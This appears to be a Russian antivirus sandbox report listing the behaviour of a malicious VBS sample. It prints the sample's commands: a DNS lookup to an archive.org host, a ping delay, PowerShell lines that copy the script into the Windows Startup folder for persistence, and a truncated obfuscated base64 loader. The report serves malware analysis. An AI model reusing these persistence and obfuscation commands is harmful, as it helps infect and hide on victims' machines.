Техническая информация
- DNS ASK ia#####4.us.archive.org
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('<SYSTEM32>\<Имя файла>.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Progra... (со скрытым окном)
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command [System.IO.File]::Copy('<SYSTEM32>\<Имя файла>.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.aruturtsnoc.vbs')')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⤫ ⾙ ㍍ ⺻ ㏥Bp⤫ ⾙ ㍍ ⺻ ㏥G0⤫ ⾙ ㍍ ⺻ ㏥YQBn⤫ ⾙ ㍍ ⺻ ㏥GU⤫ ⾙ ㍍ ⺻ ㏥VQBy⤫ ⾙ ㍍ ⺻ ㏥Gw⤫ ⾙ ㍍ ⺻ ㏥I⤫ ⾙ ㍍ ⺻ ㏥⤫ ⾙ ㍍ ⺻ ㏥9⤫ ⾙ ㍍ ⺻ ㏥C⤫ ⾙ ㍍ ⺻ ㏥⤫ ⾙ ㍍ ⺻ ㏥JwBo⤫ ⾙ ㍍ ⺻ ㏥HQ⤫ ⾙ ㍍ ⺻ ㏥d⤫ ⾙ ㍍ ⺻ ㏥Bw⤫ ⾙ ㍍ ⺻ ㏥... (со скрытым окном)